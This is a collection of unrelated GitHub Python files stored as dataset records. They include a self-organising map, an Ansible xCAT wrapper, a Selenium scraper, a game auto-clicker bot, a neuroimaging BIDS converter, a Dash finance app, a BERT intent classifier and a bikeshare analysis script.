print(\"\\33[32m g for Iris-virginica : \",g,\"\\33[37m\")\n print(\"\\33[33m o for Iris-setosa : \",o,\"\\33[37m\")\n \n\n def distance_vect(self,tab1,tab2):\n distance = 0.0\n for i in range(self.size):\n distance = distance + math.pow((tab1[i]-tab2[i]),2)\n return math.sqrt(distance)\n\n def trouve_bmu(self,vect):\n min = 100.0\n for index in range(len(self.maps)):\n distance = self.distance_vect(vect.x,self.maps[index].w)\n if distance == min:\n bmu.append(self.get_index(index))\n if distance < min:\n bmu = []\n bmu.append(self.get_index(index))\n min = distance\n return bmu\n\n def aleatoir_bmu(self,bmu):\n return bmu[random.randint(0,len(bmu)-1)]\n\n def change_etiquet(self,bmu,vect):\n self.get_maps(bmu.ligne,bmu.colonne).etiquet = vect.id[8]\n \n def modifier_poids(self,vect,bmu,alpha,rayon):\n for i in range(max(0,bmu.ligne-rayon),min(bmu.ligne+rayon,self.row-1)+1):\n for j in range(max(0,bmu.colonne-rayon),min(bmu.colonne+rayon,self.col-1)+1):\n for k in range(self.size):\n self.get_maps(i,j).w[k] = self.get_maps(i,j).w[k] + alpha * (vect.x[k] -self.get_maps(i,j).w[k])\n\n def apprentisage(self,base,iteration,alpha_initial):\n rayon = 3\n partie = int(iteration/rayon)\n for t in range(iteration):\n alpha = alpha_initial * (1 - (t/iteration))\n random.shuffle(base.vect)\n for vect in base.vect:\n bmu = self.aleatoir_bmu(self.trouve_bmu(vect))\n self.change_etiquet(bmu,vect)\n self.modifier_poids(vect,bmu,alpha,rayon)\n if t == partie:\n rayon = 2\n if t == 2*partie:\n rayon = 1\n \n\n \n\n\n \n\n","repo_name":"alihaydar8/SOM_py","sub_path":"network.py","file_name":"network.py","file_ext":"py","file_size_in_byte":3784,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"32013292321","text":"#!/usr/bin/python\n\nimport datetime\nimport six\nimport subprocess\nimport traceback\n\nREADONLY_CMDS = ['lsdef', 'tabdump']\n\n\nclass XCATPlayException(Exception):\n \"\"\"Base xcat play Exception\n\n To correctly use this class, inherit from it and define\n a '_msg_fmt' property. That message will get printf'd\n with the keyword arguments provided to the constructor.\n\n If you need to access the message from an exception you should use\n six.text_type(exc)\n\n \"\"\"\n _msg_fmt = \"An unknown exception occurred.\"\n\n def __init__(self, message=None, **kwargs):\n self.kwargs = kwargs\n\n if not message:\n # Check if class is using deprecated 'message' attribute.\n if (hasattr(self, 'message') and self.message):\n self._msg_fmt = self.message\n\n try:\n message = self._msg_fmt % kwargs\n\n except Exception as e:\n message = self._msg_fmt\n\n super(XCATPlayException, self).__init__(message)\n\n def __str__(self):\n \"\"\"Encode to utf-8 then wsme api can consume it as well.\"\"\"\n if not six.PY3:\n return unicode(self.args[0]).encode('utf-8')\n\n return self.args[0]\n\n def __unicode__(self):\n \"\"\"Return a unicode representation of the exception message.\"\"\"\n return unicode(self.args[0])\n\n\ndef _execute_command(cmd, **kwargs):\n if not kwargs.get('stdin'):\n kwargs['stdin'] = subprocess.PIPE\n if not kwargs.get('stdout'):\n kwargs['stdout'] = subprocess.PIPE\n if not kwargs.get('stderr'):\n kwargs['stderr'] = subprocess.PIPE\n try:\n pobj = subprocess.Popen(cmd, **kwargs)\n (out, err) = pobj.communicate()\n rc = pobj.returncode\n return (rc, out, err)\n except subprocess.CalledProcessError:\n if kwargs['shell']:\n raise XCATPlayException(cmd=cmd)\n else:\n raise XCATPlayException(cmd=' '.join(cmd))\n\n\nclass XCATWorker(object):\n def __init__(self, module):\n self.module = module\n self.params = module.params\n self.rc = None\n self.changed = True\n\n def _parse_command_options(self, map):\n if map is None:\n return ''\n options = []\n for k, v in six.iteritems(map):\n options.append(k)\n options.append(v)\n return ' '.join(options)\n\n def _parse_command_args(self, args):\n return ' '.join(args) if args is not None else ''\n\n def _exec_xcat_cmd(self):\n result = dict()\n cmd = [self.params['command'],\n self._parse_command_args(self.params['args']),\n self._parse_command_options(self.params['options']),\n ]\n cmd = ' '.join(cmd)\n startd = datetime.datetime.now()\n env = self.params['environment']\n xcat_env_path = env.get('xcat_env_path')\n cmd = \"bash -c \\'source %(env)s && %(cmd)s \\'\" % {'env': xcat_env_path,\n 'cmd': cmd}\n try:\n (rc, out, err) = _execute_command(cmd, shell=True)\n except Exception:\n result['err'] = traceback.format_exc()\n self.rc = -1\n return dict(failed=True, changed=self.changed, rc=self.rc, cmd=cmd,\n msg=\"Command error: {}\".format(result))\n\n endd = datetime.datetime.now()\n delta = endd - startd\n result['out'] = out\n self.rc = int(rc)\n # command success\n if self.rc is not 0:\n result['err'] = err\n return dict(failed=True, changed=self.changed, rc=self.rc,\n startd=str(startd), endd=str(endd),\n delta=str(delta),\n msg=\"Command error: {}\".format(result),\n cmd=cmd, out=out, err=err)\n else:\n return dict(changed=self.changed, rc=self.rc, startd=str(startd),\n endd=str(endd), delta=str(delta),\n msg=\"Command success: {}\".format(result),\n cmd=cmd, out=out, err=err)\n\n def exec_xcat_cmd(self):\n if self.params['command'] in READONLY_CMDS:\n self.changed = False\n result = self._exec_xcat_cmd()\n if self.rc != 0:\n self.module.fail_json(**result)\n return\n if self.params['format_obj']:\n self._format_object_result(result)\n self.module.exit_json(**result)\n\n def _format_object_result(self, result):\n \"\"\"Process object output from xcat command\n\n Object name: kvmhost\n groups=all\n ip=10.5.101.1\n postbootscripts=otherpkgs\n postscripts=syslog,remoteshell,syncfiles\n Object name: testnode1\n arch=x86_64\n currchain=boot\n currstate=boot\n groups=all\n initrd=xcat/osimage/ubuntu16.04.1-x86_64-install-compute/initrd.img\n \"\"\"\n out = result['out']\n lines = out.split('\\n')\n obj = None\n xcat_objs = []\n xcat_attrs = dict()\n for line in lines:\n line = line.strip()\n if line.startswith('Object name:'):\n if obj is not None:\n xcat_objs.append(xcat_attrs)\n temp = line.split(':')\n if len(temp) > 1:\n obj = line.split(':')[1].strip()\n xcat_attrs['name'] = obj\n continue\n elif obj is not None:\n temp = line.split('=')\n if len(temp) > 1:\n key = line.split('=')[0].strip()\n val = line.split('=')[1].strip()\n xcat_attrs[key] = val\n if obj is not None:\n xcat_objs.append(xcat_attrs)\n result['xcat_objs'] = xcat_objs\n\n\ndef generate_module():\n argument_spec = dict(\n command=dict(requried=True, type='str'),\n options=dict(required=False, type='dict'),\n args=dict(required=False, type='list'),\n format_obj=dict(required=False, type='str'),\n stdin=dict(required=False, type='str'),\n stdout=dict(required=False, type='str'),\n environment=dict(required=False, type='dict'),\n )\n module = AnsibleModule(\n argument_spec=argument_spec,\n bypass_checks=True\n )\n env = module.params.pop('environment', dict())\n new_args = module.params.pop('common_options', dict())\n new_args['environment'] = {'xcat_env_path': '/etc/profile.d/xcat.sh'}\n if env:\n new_args['environment'].update(env)\n\n for key, value in module.params.items():\n if key in new_args and value is None:\n continue\n new_args[key] = value\n\n module.params = new_args\n return module\n\n\ndef main():\n module = generate_module()\n\n try:\n XCATWorker(module).exec_xcat_cmd()\n # if ret is not None:\n # xcat_worker.print_json_data(ret)\n except Exception:\n module.exit_json(failed=True, changed=True,\n msg=repr(traceback.format_exc()))\n\n\n# import module snippets\nfrom ansible.module_utils.basic import * # noqa\n\nif __name__ == '__main__':\n main()\n","repo_name":"chenglch/xcat-play","sub_path":"ansible/xcat2/library/xcat_cmd.py","file_name":"xcat_cmd.py","file_ext":"py","file_size_in_byte":7246,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"18"} +{"seq_id":"5307975692","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Mon Apr 3 21:48:08 2017\n\n@author: byung\n\"\"\"\n\nfrom selenium import webdriver\nfrom selenium.webdriver.common.keys import Keys\n\nurl = 'https://play.google.com/store/apps/details?id=com.venticake.retrica&hl=ko#details-reviews'\n\ndriver = webdriver.Chrome(executable_path=r'D:\\DataScience\\chromedriver.exe')\ndriver.get(url)\n\n\n\n\nelem = driver.find_element_by_name(\"q\")\nelem.clear()\nelem.send_keys(\"pycon\")\nelem.send_keys(Keys.RETURN)\n\ntmp = driver.page_source\n\nassert \"No results found.\" not in driver.page_source\ndriver.close()","repo_name":"byungjun0689/DataScience","sub_path":"3. Python/04. 개인/Crawling/Selenium.py","file_name":"Selenium.py","file_ext":"py","file_size_in_byte":561,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"18"} +{"seq_id":"769751915","text":"from PIL import ImageGrab as IG\nfrom PIL import ImageOps as IO\nimport win32api, win32con\nimport time\n\n'''\n\nAll coordinates assume a screen resolution of 1920x1080, and Opera \nno Bookmarks Toolbar enabled, running in a Win8 PC.\nURL = http://goo.gl/6v7nM6\nx_pad = 462\ny_pad = 68\nPlay area = x_pad+1, y_pad+1, 901, 727\n(145, 88, 62)\n\n'''\n\nclass IterationLimit(Exception):\n def __init__(self, message, errors):\n\n # Call the base class constructor with the parameters it needs\n super(IterationLimit, self).__init__(message)\n\n # Now for your custom code...\n self.errors = errors\n\nclass ColorNotFound(Exception):\n def __init__(self, message, errors):\n\n # Call the base class constructor with the parameters it needs\n super(ColorNotFound, self).__init__(message)\n\n # Now for your custom code...\n self.message = message\n self.errors = errors\n\nclass Coord:\n\tleft = (75, 395)\n\tright = (360, 395)\n\tplay = (219, 476)\n\t\n\tlTree = (103, 217)\n\trTree = (333, 217)\n\n\tlMan = (145, 498)\n\trMan = (295, 498)\n\n\tscore = (227, 117)\n\tGameOver = (287, 227)\n\nclass Color:\n\tTree = (163, 150, 63)\n\tNoTree = (156, 98, 70)\n\tAd = (187, 187, 187)\n\tGameOver = (236, 183, 91)\n\ndef leftTree(im):\n\tcolor = im.getpixel(Coord.lTree)\n\tif color == Color.Tree:\n\t\tprint('Careful')\n\t\tclick(Coord.left)\n\t\tchangeSide('right')\n\telif color == Color.NoTree:\n\t\tclick(Coord.left)\n\t\tleftTimber()\n\telse:\n\t\traise ColorNotFound('leftTree', color)\n\ndef rightTree(im):\n\tcolor = im.getpixel(Coord.rTree)\n\tif color == Color.Tree:\n\t\tprint('Careful')\n\t\tclick(Coord.right)\n\t\tchangeSide('left')\n\telif color == Color.NoTree:\n\t\tclick(Coord.right)\n\t\trightTimber()\n\telse:\n\t\tprint('Score = ' + str(n-1))\n\t\traise ColorNotFound('rightTree', color)\n\ndef leftTimber():\n\tif n%150 == 0:\n\t\traise IterationLimit('Left' , 'left')\n\tim = screenGrab()\n\tleftTree(im)\n\ndef rightTimber():\n\tif n%150 == 0:\n\t\traise IterationLimit('Right' , 'right')\n\tim = screenGrab()\n\trightTree(im)\n\ndef changeSide(string):\n\tif string == 'right':\n\t\tclick(Coord.right)\n\t\tclick(Coord.right)\n\t\trightTimber()\n\telif string == 'left':\n\t\tclick(Coord.left)\n\t\tclick(Coord.left)\n\t\tleftTimber()\n\telse:\n\t\tprint('WTF!?')\n\ndef screenGrab():\n\tim = IG.grab(box)\n\treturn im\n\ndef leftClick():\n\tglobal c\n\tc += 1\n\ttime.sleep(.005)\n\twin32api.mouse_event(win32con.MOUSEEVENTF_LEFTDOWN, 0, 0)\n\ttime.sleep(.005)\n\twin32api.mouse_event(win32con.MOUSEEVENTF_LEFTUP, 0, 0)\n\tprint('Clic!')\n\ttime.sleep(.03) #recommended 0.008\n\ndef mousePos(coord):\n\twin32api.SetCursorPos((x_pad + coord[0], y_pad + coord[1]))\n\ndef getCoords():\n\tx,y = win32api.GetCursorPos()\n\tx = x - x_pad\n\ty = y - y_pad\n\tprint(x,y)\n\ndef click(xy):\n\tglobal n\n\tn += 1\n\tmousePos(xy)\n\tif xy == Coord.left:\n\t\tprint('left', end=' ')\n\telif xy == Coord.right:\n\t\tprint('right', end=' ')\n\telse:\n\t\tprint('play', end=' ')\n\tleftClick()\n\ndef startGame(string):\n\tglobal n\n\n\tif not n > 1:\n\t\tclick(Coord.play)\n\t\ttime.sleep(.1)\n\n\ttry:\n\t\tif string == 'left':\n\t\t\tleftTimber()\n\t\telif string == 'right':\n\t\t\trightTimber()\n\n\texcept IterationLimit as e:\n\t\tn += 1\n\t\tstartGame(e.errors)\n\n\texcept ColorNotFound as ce:\n\t\tprint('-'*80)\n\t\tprint('In ' + str(ce.message) + ', the bot found the rgb color: ' + str(ce.errors))\n\t\tprint('Aprox. Score = ', int(c/2))\n\ndef main():\n\tstartGame('left')\n\n# GLOBALS\nx_pad = 462\ny_pad = 68\nbox = (x_pad + 1, y_pad + 1, x_pad + 439, y_pad + 659)\nn = 0\nc = 0\nsg = 0\n\nif __name__ == '__main__':\n\tmain()","repo_name":"redcpp/timberPlayer2.0","sub_path":"timberPlayer_2.0.py","file_name":"timberPlayer_2.0.py","file_ext":"py","file_size_in_byte":3410,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"18"} +{"seq_id":"26952342369","text":"\"\"\"Convert the NIFD dataset into BIDS.\"\"\"\n\nfrom os import PathLike\nfrom typing import List\n\n\ndef convert_images(\n path_to_dataset: PathLike,\n bids_dir: PathLike,\n path_to_clinical: PathLike,\n) -> List[PathLike]:\n \"\"\"Convert the entire dataset in BIDS.\n\n Scans available files in the path_to_dataset,\n identifies the patients that have images described by the JSON file,\n converts the image with the highest quality for each category.\n \"\"\"\n\n import clinica.iotools.bids_utils as bids\n\n from .nifd_utils import (\n dataset_to_bids,\n read_clinical_data,\n read_imaging_data,\n write_bids,\n )\n\n clinical_data = read_clinical_data(path_to_clinical)\n imaging_data = read_imaging_data(path_to_dataset)\n\n participants, sessions, scans = dataset_to_bids(\n imaging_data=imaging_data, clinical_data=clinical_data\n )\n\n written = write_bids(\n to=bids_dir,\n participants=participants,\n sessions=sessions,\n scans=scans,\n )\n readme_data = {\n \"link\": \"https://ida.loni.usc.edu/home/projectPage.jsp?project=NIFD&page=HOME&subPage=OVERVIEW_PR#\",\n \"desc\": (\n \"NIFD is the nickname for the frontotemporal lobar degeneration neuroimaging initiative \"\n \"(FTLDNI, AG032306), which was funded by the NIA and NINDS to characterize longitudinal clinical and \"\n \"imaging changes in FTLD.The imaging and clinical methods are the same for NIFD and for the 4-Repeat \"\n \"Tauopathy Neuroimaging Initiative (4RTNI), which is also available for download from LONI. Controls for \"\n \"NIFD are the same controls as those collected for 4RTNI.\"\n ),\n }\n bids.write_modality_agnostic_files(\n study_name=\"NIFD\", readme_data=readme_data, bids_dir=bids_dir\n )\n return written\n","repo_name":"aramis-lab/clinica","sub_path":"clinica/iotools/converters/nifd_to_bids/nifd_to_bids.py","file_name":"nifd_to_bids.py","file_ext":"py","file_size_in_byte":1840,"program_lang":"python","lang":"en","doc_type":"code","stars":196,"dataset":"github-code","pt":"18"} +{"seq_id":"34464920491","text":"# Definition for a binary tree node.\n# class TreeNode:\n# def __init__(self, x):\n# self.val = x\n# self.left = None\n# self.right = None\n\nclass Solution:\n def bstToGst(self, root: TreeNode) -> TreeNode:\n def in_order(node):\n if node != None:\n in_order(node.right)\n # print(node.val)\n total = nodes.pop(0)\n total += node.val\n nodes.append(total)\n node.val = total\n in_order(node.left)\n \n nodes = [0]\n in_order(root)\n return root\n \n","repo_name":"mainuddin-rony/leetcode","sub_path":"problem_1038.py","file_name":"problem_1038.py","file_ext":"py","file_size_in_byte":624,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"13563862663","text":"from __future__ import print_function\nimport os\nimport datetime\nimport time\nfrom com.sirui.sim.resources import *\nfrom com.sirui.sim.atom import *\n\ndef adsorption():\n logger = logging.getLogger()\n while True:\n try:\n yield Context.getEnv().timeout(1)\n except simpy.Interrupt as i:\n print('adsorption process interrupted. ')\n return\n\n if Atom.num >= Config.SCOPE_SIZE * Config.SCOPE_SIZE * Config.SCOPE_HEIGHT:\n logger.debug('reaches 100% ')\n stop_process = Context.getEnv().process(stopSimulation())\n Context.addProcess('Stop', stop_process)\n\n adsorption_rate = Config.ADSORPTION_RATE\n while adsorption_rate >= 1:\n Atom.createOne()\n adsorption_rate -= 1\n if random.random() < adsorption_rate:\n Atom.createOne()\n\ndef clock():\n logger = logging.getLogger()\n start = time.clock()\n while True:\n logger.debug(\"clock: %d\" % Context.getEnv().now)\n end = time.clock()\n print(\"clock: %d / %s. %d%%\" % (Context.getEnv().now, Config.SIM_TIME, round((end - start)*100/60/Config.time_limit)))\n if (end - start) > 60*Config.time_limit:\n # early termination\n print('simulation terminated due to long running time!')\n stop_process = Context.getEnv().process(stopSimulation())\n Context.addProcess('Stop', stop_process)\n\n try:\n yield Context.getEnv().timeout(1)\n except simpy.Interrupt as i:\n print('clock process interrupted. ')\n return\n\n\n\n\ndef printInfo():\n logger = logging.getLogger()\n now = datetime.datetime.now()\n logger.info(now.strftime(\"%Y-%m-%d %H:%M\"))\n logger.info('Delta_Mu: %s Phi: %s' % (Config.delta_mu, Config.phi))\n logger.info('Deposition rate per site: %s ' % Config.ADSORPTION_RATE_PER_SITE)\n logger.info(\"Simulation starts. #InitAtom: %d, Field: %d*%d*%d, Time: %s\" % (Config.NUM_ATOM, Config.SCOPE_SIZE, Config.SCOPE_SIZE, Config.SCOPE_HEIGHT, Config.SIM_TIME))\n\n print('Delta_Mu: %s Phi: %s' % (Config.delta_mu, Config.phi))\n print('Deposition rate per site: %s ' % Config.ADSORPTION_RATE_PER_SITE)\n print(\"Simulation starts. #InitAtom: %d, Field: %d*%d*%d, Time: %s\" % (Config.NUM_ATOM, Config.SCOPE_SIZE, Config.SCOPE_SIZE, Config.SCOPE_HEIGHT, Config.SIM_TIME))\n\ndef cleanUp():\n logger = logging.getLogger()\n logger.handlers = []\n\ndef stopSimulation():\n # interrupt all other process\n while True:\n deposition_process = Context.getProcess('Adsorption')\n if deposition_process is not None:\n deposition_process.interrupt(('Stop', 0))\n yield deposition_process\n\n atoms = Context.getAtoms()\n for atom in atoms:\n atom.process.interrupt(('Stop', 0))\n\n clock_process = Context.getProcess('Clock')\n if clock_process is not None:\n clock_process.interrupt(('Stop', 0))\n yield clock_process\n\n return\n\ndef resetAtoms():\n Atom.id = 0\n Atom.num = 0\n\ndef configLogger(log_level, log_info_path):\n logger = logging.getLogger()\n logger.setLevel(logging.DEBUG)\n\n # console handler\n ch = logging.StreamHandler()\n ch.setLevel(log_level)\n logger.addHandler(ch)\n\n # create a file handler\n fh = logging.FileHandler(log_info_path)\n fh.setLevel(logging.INFO)\n logger.addHandler(fh)\n\ndef main(delta_mu, phi, log_level):\n log_info_path = 'logs/sim_mu%s_phi%s' % (delta_mu, phi)\n if os.path.exists(log_info_path):\n os.remove(log_info_path)\n\n configLogger(log_level, log_info_path)\n\n Config.setParameters(delta_mu, phi)\n\n printInfo()\n\n if Config.SCOPE_SIZE * Config.SCOPE_SIZE * 2 < Config.NUM_ATOM:\n raise ValueError(\"Number of initial atom is too much\")\n # Setup and start the simulation\n random.seed(Config.RANDOM_SEED) # This helps reproducing the results\n # Create an environment and start the setup process\n env = simpy.Environment()\n field = Field(env, Config.SCOPE_SIZE)\n context = Context.create(field=field, env=env)\n resetAtoms()\n\n clock_process = env.process(clock())\n deposition_process = env.process(adsorption())\n\n context.addProcess('Clock', clock_process)\n context.addProcess('Adsorption', deposition_process)\n Atom.createInit(Config.NUM_ATOM)\n\n # Execute!\n env.run(until=Config.SIM_TIME)\n\n cleanUp()\n\nif __name__ == '__main__':\n\n\n main(1.0, 0.1, logging.DEBUG)","repo_name":"siruix/CrystalGrowthSimulation","sub_path":"com/sirui/sim/simulate.py","file_name":"simulate.py","file_ext":"py","file_size_in_byte":4491,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"18"} +{"seq_id":"33655373059","text":"\"\"\"\nhttp://pythontutor.ru/lessons/2d_arrays/problems/2d_max/\n\nНайдите индексы первого вхождения максимального элемента. Выведите два числа: номер строки и номер столбца,\nв которых стоит наибольший элемент в двумерном массиве. Если таких элементов несколько, то выводится тот,\nу которого меньше номер строки, а если номера строк равны то тот, у которого меньше номер столбца.\n\nПрограмма получает на вход размеры массива n и m, затем n строк по m чисел в каждой.\n\"\"\"\n\nn, m = [int(i) for i in input().split()]\n\nlst = []\nfor i in range(n):\n lst.append([int(j) for j in input().split()])\n\n_i = 0\n_j = 0\n_max = lst[_i][_j]\nfor i in range(n):\n if max(lst[i]) > _max:\n _max = max(lst[i])\n _i = i\n _j = lst[i].index(_max)\n\nprint(_i, _j)\n","repo_name":"ornichola/learning-new","sub_path":"pythontutor-ru/09_2d_arrays/01_2d_max.py","file_name":"01_2d_max.py","file_ext":"py","file_size_in_byte":1075,"program_lang":"python","lang":"ru","doc_type":"code","stars":3,"dataset":"github-code","pt":"18"} +{"seq_id":"36489702325","text":"from typing import Iterable, Mapping\nimport pandas as pd\n\nimport dash\nfrom dash import dcc, html, dash_table\nimport dash_bootstrap_components as dbc\nimport dash_daq as daq\n\nfrom app import app, df\nfrom styles import SIDEBAR_STYLE, CONTENT_STYLE, COMPANY_PAGE\n\nfrom components.dropdowns import ticker_dropdown, commodities_dropdown, industry_dropdown, fred_dropdown\nfrom components.charts import commodity_chart, price_chart, fred_chart, industry_chart\n\n''' PAGES '''\nhomepage = dbc.Container([\n html.H1('Home Page'),\n])\n\ncommodity_page = dbc.Container([\n commodities_dropdown,\n commodity_chart\n])\n\ncompany_page = dbc.Container([\n ticker_dropdown,\n price_chart\n], style=COMPANY_PAGE)\n\nfred_page = dbc.Container([\n fred_dropdown,\n daq.BooleanSwitch(id='log-switch', on=False, label='log-Y', labelPosition='top', color='#9B51E0'),\n fred_chart\n])\n\nindustry_page = dbc.Container([\n industry_dropdown,\n industry_chart\n])\n\n##############\n# Main Layout\n##############\n\nsidebar = html.Div(\n [\n html.H2(\"Fiancial Analysis\", className=\"display-6\"),\n html.Hr(),\n html.P(\n \"Select a page below\", className=\"lead\"\n ),\n dbc.Nav(\n [\n dbc.NavLink(\"Home\", href=\"/\", active=\"exact\"),\n dbc.NavLink(\"Company Overview\", href=\"/company_overview\", active=\"exact\"),\n dbc.NavLink(\"Industry Analysis\", href=\"/industries\", active=\"exact\"),\n dbc.NavLink(\"FRED\", href=\"/fred\", active=\"exact\"),\n dbc.NavLink(\"Commodities\", href=\"/commodities\", active=\"exact\"),\n ],\n vertical=True,\n pills=True,\n ),\n ],\n style=SIDEBAR_STYLE,\n)\n\ncontent = html.Div(id=\"page-content\", style=CONTENT_STYLE)\n\ndef main_layout() -> html.Div:\n return html.Div(\n children=[\n dcc.Location(id='url'),\n sidebar,\n content\n ]\n )\n\n","repo_name":"travisv/dash_apps","sub_path":"finance_app/layouts.py","file_name":"layouts.py","file_ext":"py","file_size_in_byte":1932,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"72558001000","text":"#! -*- coding: utf-8 -*-\n\nimport torch\n\nfrom utils.utils import tokenizer\nfrom inputters import InputFeatures\nfrom classification.models import BertForMultiLabelSequenceClassification\n\nLABELS = ['alarm', 'bag', 'chat', 'command', 'face', 'greet', 'intelligent_home', 'machine', 'food',\n 'music', 'news', 'query', 'radio', 'sleep', 'story', 'time', 'volume', 'weather', 'study']\nBERT_MODEL = '/data/gump/bert_chinese/chinese_L-12_H-768_A-12'\nNUM_LABELS = 19\nSTATE_DICT = '/data/gump/bert_chinese/chinese_L-12_H-768_A-12/cache/finetuned_pytorch_model14.bin'\n\nstate_dict = torch.load(STATE_DICT, map_location=lambda storage, loc: storage)\n\n\nclass Predict(object):\n def __init__(self):\n self.model = BertForMultiLabelSequenceClassification.from_pretrained(BERT_MODEL, num_labels=NUM_LABELS,\n state_dict=state_dict)\n # if torch.cuda.is_available():\n # self.model.cuda()\n self.max_length = 18\n self.label_map = {i: label for i, label in enumerate(LABELS)}\n self.tokenizer = tokenizer()\n\n def get_features(self, sentence):\n features = []\n tokens = self.tokenizer.tokenize(sentence)\n tokens = [\"[CLS]\"] + tokens + [\"[SEP]\"]\n\n segment_ids = [0] * len(tokens)\n\n input_ids = self.tokenizer.convert_tokens_to_ids(tokens)\n input_mask = [1] * len(input_ids)\n\n padding = [0] * (self.max_length - len(input_ids))\n input_ids += padding\n input_mask += padding\n segment_ids += padding\n\n features.append(InputFeatures(input_ids=input_ids,\n input_mask=input_mask,\n segment_ids=segment_ids,\n label_id=None))\n return features\n\n def predict(self, sentence):\n features = self.get_features(sentence)\n input_ids = torch.tensor([item.input_ids for item in features], dtype=torch.long) # .cuda()\n input_mask = torch.tensor([item.input_mask for item in features], dtype=torch.long) # .cuda()\n segment_ids = torch.tensor([item.segment_ids for item in features], dtype=torch.long) # .cuda()\n\n with torch.no_grad():\n logits = self.model(input_ids, input_mask, segment_ids).view(-1,).sigmoid()\n\n score = {self.label_map[i]: item for i, item in enumerate(logits.tolist())}\n\n score = sorted(score.items(), key=lambda x: x[1], reverse=True)\n return score[:3]\n\n\nif __name__ == '__main__':\n sentences = '你去学习吧'\n result = Predict().predict(sentences)\n print(result)\n","repo_name":"gump1368/bert-awesome","sub_path":"classification/predict.py","file_name":"predict.py","file_ext":"py","file_size_in_byte":2650,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"21177028130","text":"import time\nimport pandas as pd\nimport numpy as np\n\nCITY_DATA = { 'chicago': 'chicago.csv',\n 'new york city': 'new_york_city.csv',\n 'washington': 'washington.csv' }\n\ndef get_filters():\n \"\"\"\n Asks user to specify a city, month, and day to analyze.\n\n Returns:\n (str) city - name of the city to analyze\n (str) month - name of the month to filter by, or \"all\" to apply no month filter\n (str) day - name of the day of week to filter by, or \"all\" to apply no day filter\n \"\"\"\n print('Hello! Let\\'s explore some US bikeshare data!')\n # get user input for city (chicago, new york city, washington).\n \n cities =['chicago', 'new york city', 'washington']\n city = ''\n while city not in cities:\n city = input(\"Which city do you want to have a closer look at? Choose one of Chicago, New York City or Washington: \").lower()\n if city not in cities: \n print('Try again!')\n else:\n break\n print(\"\\nYou chose, {}!\".format(city))\n \n # get user input for month\n months =['all','january','february','march','april','may','june','july','august','september','october','november','december']\n month = ''\n while month not in months:\n month = input(\"Which month do you want to have a closer look at? Choose one of All, January, February, March, April, May, June, July, August, September, October, November, December: \").lower()\n if month not in months: \n print('try again!')\n else:\n break\n print(\"\\nYou chose, {}!\".format(month))\n\n\n # get user input for day of week (all, monday, tuesday, ... sunday)\n days =['all','monday','tuesday','wednesday','thursday','friday','saturday','sunday']\n day = ''\n while day not in days:\n day = input(\"Which day do you want to have a closer look at? Choose one: All, Monday, Tuesday, Wednesday, Thursday, Friday, Saturday, Sunday: \").lower()\n if day not in days: \n print('Try again!')\n else:\n break\n print(\"\\nYou chose, {}!\".format(day))\n \n print(\"\\nYour filters are: {},{},{}!\".format(city, month, day)) \n print('-'*40)\n return city, month, day\n\n\ndef load_data(city, month, day):\n \"\"\"\n Loads data for the specified city and filters by month and day if applicable.\n\n Args:\n (str) city - name of the city to analyze\n (str) month - name of the month to filter by, or \"all\" to apply no month filter\n (str) day - name of the day of week to filter by, or \"all\" to apply no day filter\n Returns:\n df - Pandas DataFrame containing city data filtered by month and day\n \"\"\"\n\n # load data file into a dataframe\n df = pd.read_csv(CITY_DATA[city])\n\n # convert the Start Time column to datetime\n df['Start Time'] = pd.to_datetime(df['Start Time'])\n\n # extract month and day of week from Start Time to create new columns\n df['month'] = df['Start Time'].dt.month\n df['day_of_week'] = df['Start Time'].dt.weekday_name\n df['hour'] = df['Start Time'].dt.hour\n # filter by month if applicable\n if month != 'all':\n # use the index of the months list to get the corresponding int\n months =['january','february','march','april','may','june','july','august','september','october','november','december']\n month = months.index(month) + 1\n\n # filter by month to create the new dataframe\n df = df[df['month'] == month]\n\n # filter by day of week if applicable\n if day != 'all':\n # filter by day of week to create the new dataframe\n df = df[df['day_of_week'] == day.title()]\n return df\n\ndef time_stats(df):\n \"\"\"Displays statistics on the most frequent times of travel.\"\"\"\n \n print('\\nCalculating The Most Frequent Times of Travel...\\n')\n start_time = time.time()\n \n # display the most common month\n months =['january','february','march','april','may','june','july','august','september','october','november','december']\n most_common_month = months[df['month'].mode()[0]-1].title()\n print(\"Most common month is: {}\".format(most_common_month))\n\n # display the most common day of week\n most_common_day = df['day_of_week'].mode()[0]\n print(\"Most common day is: {}\".format(most_common_day))\n\n # display the most common start hour\n most_common_hour = df['hour'].mode()[0]\n print(\"Most common start hour is: {}\".format(most_common_hour)) \n \n print(\"\\nThis took %s seconds.\" % (time.time() - start_time))\n print('-'*40)\n\n\ndef station_stats(df):\n \"\"\"Displays statistics on the most popular stations and trip.\"\"\"\n\n print('\\nCalculating The Most Popular Stations and Trip...\\n')\n start_time = time.time()\n \n \n # display most commonly used start station\n most_common_start_station = df['Start Station'].mode()[0]\n print(\"Most common start station is: {}\".format(most_common_start_station))\n\n # display most commonly used end station\n most_common_end_station = df['End Station'].mode()[0]\n print(\"Most common end station is: {}\".format(most_common_end_station))\n\n # display most frequent combination of start station and end station trip\n most_frequent_combination = df.groupby(['Start Station','End Station']).size().idxmax()\n print(\"Most frequent combination: Start Station: {} and End Station: {}\".format(most_frequent_combination[0],most_frequent_combination[1])) \n\n print(\"\\nThis took %s seconds.\" % (time.time() - start_time))\n print('-'*40)\n\n\ndef trip_duration_stats(df):\n \"\"\"Displays statistics on the total and average trip duration.\"\"\"\n\n print('\\nCalculating Trip Duration...\\n')\n start_time = time.time()\n \n # display total travel time\n total_travel_time = df['Trip Duration'].sum()\n total_travel_time_days = int(total_travel_time//(24*60*60))\n total_travel_time_hours = int((total_travel_time%(24*60*60))//(60*60))\n total_travel_time_min = int(((total_travel_time%(24*60*60))%(60*60))//60)\n total_travel_time_sec = int(((total_travel_time%(24*60*60))%(60*60))%60)\n print(\"Total Travel Time is: {} days {} hours {} mins {} 